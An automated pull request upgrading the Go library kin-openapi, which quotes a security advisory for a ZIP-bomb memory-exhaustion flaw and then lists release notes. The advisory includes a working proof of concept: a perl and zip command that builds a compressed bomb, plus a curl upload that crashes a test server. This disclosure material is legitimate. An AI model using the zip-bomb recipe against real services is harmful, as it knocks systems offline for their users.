fix(deps): update module github.com/getkin/kin-openapi to v0.131.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
github.com/getkin/kin-openapi	v0.124.0 -> v0.131.0

GitHub Vulnerability Alerts

CVE-2025-30153

Summary

When validating a request with a multipart/form-data schema, if the OpenAPI schema allows it, an attacker can upload a crafted ZIP file (e.g., a ZIP bomb), causing the server to consume all available system memory.

Details

The root cause comes from the ZipFileBodyDecoder, which is registered automatically by the module (contrary to what the documentation says.

PoC

To reproduce the vulnerability, you can use the following OpenAPI schema:

openapi: 3.0.0
info:
  title: 'Validator'
  version: 0.0.1
paths:
  /:
    post:
      requestBody:
        required: true
        content:
          multipart/form-data:
            schema:
              type: object
              required:
                - file
              properties:
                file:
                  type: string
                  format: binary
      responses:
        '200':
          description: Created

And this code to validate the request (nothing fancy, it basically only calls the openapi3filter.ValidateRequest function`):

package main

import (
	"fmt"
	"log"
	"net/http"

	"github.com/getkin/kin-openapi/openapi3filter"
	legacyrouter "github.com/getkin/kin-openapi/routers/legacy"

	"github.com/getkin/kin-openapi/openapi3"
)

func handler(w http.ResponseWriter, r *http.Request) {
	loader := openapi3.NewLoader()

	doc, err := loader.LoadFromFile("schema.yaml")
	if err != nil {
		http.Error(w, "Failed to load OpenAPI document", http.StatusInternalServerError)
		return
	}

	if err := doc.Validate(r.Context()); err != nil {
		http.Error(w, "Invalid OpenAPI document", http.StatusBadRequest)
		return
	}

	router, err := legacyrouter.NewRouter(doc)
	if err != nil {
		http.Error(w, "Failed to create router", http.StatusInternalServerError)
		return
	}

	route, pathParams, err := router.FindRoute(r)
	if err != nil {
		http.Error(w, "Failed to find route", http.StatusNotFound)
		return
	}

	input := &openapi3filter.RequestValidationInput{
		Request:     r,
		QueryParams: r.URL.Query(),
		Route:       route,
		PathParams:  pathParams,
	}

	if err := openapi3filter.ValidateRequest(r.Context(), input); err != nil {
		http.Error(w, fmt.Sprintf("Request validation failed: %v", err), http.StatusBadRequest)
		return
	}

	w.Write([]byte("request ok !"))
}

func main() {
	http.HandleFunc("/", handler)
	log.Fatal(http.ListenAndServe(":8080", nil))

}

We also need to create a zip bomb. This command will create a 4.7GB file and compress it to to 4.7MB zip archive:

perl -e 'print "0" x 5000000000' > /tmp/bigfile.txt; zip -9 /tmp/bomb.zip /tmp/bigfile.txt

Run the PoC provided, and upload the zip bomb with curl localhost:8080/ -F file="@​/tmp/bomb.zip;type=application/zip" -v.

Observe the memory consumption of the test server during and after the upload (it jumped to a bit over 22GB in my testing, with only a 4.7MB input file, you can reduce the size of the generated file to not kill your test machine when reproducing.)

Impact

An attacker can trigger an out-of-memory (OOM) condition, leading to server crashes or degraded performance.
It seems to only be exploitable if the OpenAPI schema allows for multipart upload.

Remediation

I see at least 2 potential fixes/improvements:

• Do not register by default the zip file decoder (I honestly was a bit surprised to see it was enabled by default, it seems to be quite a niche use-case ?)
• Update ZipFileBodyDecoder to enforce a maximum size of the decompressed archive and bailout as soon as it's reached (probably with a small default value and allow the users to configure it through the input options ?)

---

Release Notes

getkin/kin-openapi (github.com/getkin/kin-openapi)

v0.131.0

Compare Source

What's Changed

• openapi3filter: de-register ZipFileBodyDecoder and make a few decoders public by @​fenollp in #​1059

Full Changelog: getkin/kin-openapi@v0.130.0...v0.131.0

v0.130.0

Compare Source

What's Changed

• feat(openapi3gen): Customize json.RawMessage by @​kyleconroy in #​1050
• openapi3gen: Fix issue with separate component generated for time.Time by @​d1vbyz3r0 in #​1052
• openapi3filter: Remove redundant ExcludeResponseBody check by @​tatsumack in #​1056
• openapi3: use origin to minimize collisions by @​reuvenharrison in #​1057
• openapi3: delete origin keys only when IncludeOrigin=true by @​reuvenharrison in #​1055
• openapi3filter: apply default values of an array in a query param with exploded = false by @​nhochstr in #​1054

New Contributors

• @​kyleconroy made their first contribution in #​1050
• @​d1vbyz3r0 made their first contribution in #​1052
• @​tatsumack made their first contribution in #​1056
• @​nhochstr made their first contribution in #​1054

Full Changelog: getkin/kin-openapi@v0.129.0...v0.130.0

v0.129.0

Compare Source

What's Changed

• README: add Fuego to dependents by @​EwenQuim in #​1017
• openapi3: skip a test in CI to avoid 403s from some remote server by @​fenollp in #​1019
• openapi3: introduce StringMap type to enable unmarshalling of maps with Origin by @​reuvenharrison in #​1018
• openapi3: reference originating locations in YAML specs - step 1 by @​reuvenharrison in #​1007
• openapi3: reference originating locations in YAML specs - step 2 by @​reuvenharrison in #​1024
• openapi3: process discriminator mapping values as refs by @​jgresty in #​1022
• openapi3filter: register decoder for other JSON content types by @​oliverli in #​1026
• Revert "openapi3: process discriminator mapping values as refs" by @​fenollp in #​1029
• openapi3: fail to load spec because of schema names in mapping by @​reuvenharrison in #​1027
• openapi2conv: convert schemaRef for additional props by @​jayanth-tatina-groww in #​1030
• openapi3: simplify by replacing math.Min with min by @​alexandear in #​1032
• openapi3: fix deprecation comments by @​alexandear in #​1034
• test: fix expected-actual parameters in require.Equal by @​alexandear in #​1035
• use forked yaml modules without "replace" by @​reuvenharrison in #​1038
• openapi3: update date schema formats to not match months or days of '00' by @​RulerOfTheQueendom in #​1042
• openapi3,openapi3filter: replace interface{} with any by @​alexandear in #​1040
• openapi3filter: Simplify ValidateRequest implementation by @​alexandear in #​1041
• openapi3filter: validation of x-www-form-urlencoded with arbitrary nested allOf by @​mikhalytch in #​1046
• openapi2conv: convert references in nested additionalProperties schemas by @​travisnewhouse in #​1047

New Contributors

• @​EwenQuim made their first contribution in #​1017
• @​jgresty made their first contribution in #​1022
• @​oliverli made their first contribution in #​1026
• @​jayanth-tatina-groww made their first contribution in #​1030
• @​RulerOfTheQueendom made their first contribution in #​1042
• @​mikhalytch made their first contribution in #​1046
• @​travisnewhouse made their first contribution in #​1047

Full Changelog: getkin/kin-openapi@v0.128.0...v0.129.0

v0.128.0

Compare Source

What's Changed

• openapi3filter: Fix default value for array in for query param by @​Tommy-42 in #​1000
• Add github.com/pb33f/libopenapi by @​Jille in #​1004
• Introduce an option to override the regex implementation by @​alexbakker in #​1006
• make form required field order deterministic by @​jlsherrill in #​1008
• openapi2: fix un/marshalling discriminator field by @​reversearrow in #​1011

New Contributors

• @​Tommy-42 made their first contribution in #​1000
• @​Jille made their first contribution in #​1004
• @​alexbakker made their first contribution in #​1006
• @​jlsherrill made their first contribution in #​1008

Full Changelog: getkin/kin-openapi@v0.127.0...v0.128.0

v0.127.0

Compare Source

What's Changed

• openapi3: include local reference parts in refPath saved by @​percivalalb in #​978
• fix: update type: file to type: string and format: binary by @​reversearrow in #​980
• test: add a test for #​499 by @​AnatolyRugalev in #​982
• test: add a test for #​961 by @​AnatolyRugalev in #​981
• openapi3gen: generate "nullable: true" for pointers by @​endertunc in #​987
• openapi3filter: Remove inconsistency for arrays in queries by @​TheSadlig in #​990
• openapi3filter: remove double call by @​AriehSchneier in #​993
• openapi3filter: Fix default arrays application for query parameters by @​TheSadlig in #​992
• routers: downgrade gorilla/mux to v1.8.0 for #​988 by @​fenollp in #​996
• openapi3: export ComponentRef for usage in RefNameResolver by @​fenollp in #​998
• Add note on gorillamux by @​fenollp in #​999

New Contributors

• @​reversearrow made their first contribution in #​980
• @​endertunc made their first contribution in #​987
• @​TheSadlig made their first contribution in #​990

Full Changelog: getkin/kin-openapi@v0.126.0...v0.127.0

v0.126.0

Compare Source

What's Changed

• openapi3: document v0.124.0 breaking API changes by @​percivalalb in #​964
• openapi3: introduce ReferencesComponentInRootDocument(doc *T, ref componentRef) (string, bool) by @​percivalalb in #​945
• Update Go module dependencies by @​percivalalb in #​965
• Move paragraph back to its correct section by @​percivalalb in #​967
• Replace interface{} with any by @​percivalalb in #​966
• openapi3: allow Extensions next to $ref in SchemaRef by @​paulmach in #​901
• openapi3: implement circular reference backtracking by @​AnatolyRugalev in #​970
• openapi3: improve ipv6 validation by @​AnatolyRugalev in #​971
• openapi3: resolve recursive file references by @​AnatolyRugalev in #​974
• openapi3: improve internalization ref naming to avoid collisions by @​percivalalb in #​955
• openapi3: add a test for additionalProperties: false validation by @​AnatolyRugalev in #​975
• openapi3: add support for number and integer format validators by @​AnatolyRugalev in #​976
• openapi3: allow YAML-marshaling invalid specs by @​fenollp in #​977

New Contributors

• @​paulmach made their first contribution in #​901
• @​AnatolyRugalev made their first contribution in #​970

Full Changelog: getkin/kin-openapi@v0.125.0...v0.126.0

v0.125.0

Compare Source

What's Changed

• Revert "openapi3gen: add CreateComponentSchemas option to export object schemas to components" and add with the correct contributors by @​EnriqueL8 in #​937
• openapi3: keep oneOf context in markSchemaErrorKey (#​940) by @​jordan-wu-97 in #​941
• docs: add github.com/a-h/rest to projects list by @​a-h in #​942
• openapi4filter: improve CSV resp decoder performance by @​mpoqq in #​948
• openapi3filter: ensure key matches param name before decoding in (*urlValuesDecoder) DecodeObject(..) by @​MateusFrFreitas in #​947
• openapi3: ensure YAML marshalling matches JSON's by @​damien-talos in #​943
• openapi{2,3}: surface both json/yaml unmarshal errors by @​timothympace in #​950
• openapi3(tests): use testify's YAMLEq function by @​percivalalb in #​954
• openapi3filter: add context to Validator Middleware's ErrFunc and LogFunc functions by @​crissi98 in #​953
• openapi3: move ref codegen to Go by @​percivalalb in #​956
• changelog: note API breakage from #​953 by @​fenollp in #​957
• openapi3: internalize refs for path parameters by @​selaux in #​960
• ci: drop CodeQL by @​fenollp in #​962

New Contributors

• @​EnriqueL8 made their first contribution in #​937
• @​jordan-wu-97 made their first contribution in #​941
• @​a-h made their first contribution in #​942
• @​mpoqq made their first contribution in #​948
• @​MateusFrFreitas made their first contribution in #​947
• @​damien-talos made their first contribution in #​943
• @​timothympace made their first contribution in #​950
• @​percivalalb made their first contribution in #​954
• @​crissi98 made their first contribution in #​953
• @​selaux made their first contribution in #​960

Full Changelog: getkin/kin-openapi@v0.124.0...v0.125.0

---

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.

[renovate]

ℹ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

• 2 additional dependencies were updated
• The go directive was updated for compatibility reasons

Details:

Package	Change
go	1.20 -> 1.22.5
github.com/go-openapi/jsonpointer	v0.20.2 -> v0.21.0
github.com/go-openapi/swag	v0.22.8 -> v0.23.0

[socket-security]

Review the following changes in direct dependencies. Learn more about Socket for GitHub.

Diff	Package	Supply Chain Security	Vulnerability	Quality	Maintenance	License
	github.com/​getkin/​kin-openapi@​v0.124.0 ⏵ v0.131.0	+1	+16

View full report